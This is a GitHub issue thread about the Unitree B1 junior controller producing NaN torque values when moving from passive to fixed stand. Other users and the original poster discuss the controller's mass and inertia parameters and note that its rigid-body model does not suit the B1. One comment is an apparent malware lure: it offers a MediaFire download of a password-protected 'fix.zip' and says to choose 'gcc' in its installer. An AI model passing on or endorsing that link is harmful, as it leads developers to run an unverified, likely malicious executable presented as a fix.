### ISSUE TITLE
B1 junior_ctrl the setTau function meets Nan

### ISSUE THREAD

**Issue by Jdowdy05** [unitreerobotics/unitree_guide#91]
![junior_controller_issue](https://github.com/user-attachments/assets/c573ba94-2c78-4f86-9f14-29f8b9773dc3)
when i go from passive to fixed stand the controller gives the error in the image. (as well as b1 losing its legs :0 ) when looking further it seems that the contact force isn't updating. Any solution to fix this? Thanks!

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Faduo-Liang** [comment]
i meet the same problem,can you share how to solve it? i will be appreciate.

**Comment by LianzhaoZhang** [comment]
Hello, In the unitreeRobot.cpp file, what parameters do you set for the three variables _mass, _Ib, and _pcb

**Comment by Jdowdy05** [comment]
@Faduo-Liang @LianzhaoZhang, the controller doesn't work with B1. From what I remember, the controller they provide for this is a single rigid body dynamic model, which works well enough for something like Go1 but not B1, as it's more complex. If you want something just for simulation, you can use the MIT cheetah controller, which I got to work sim in Gazebo.
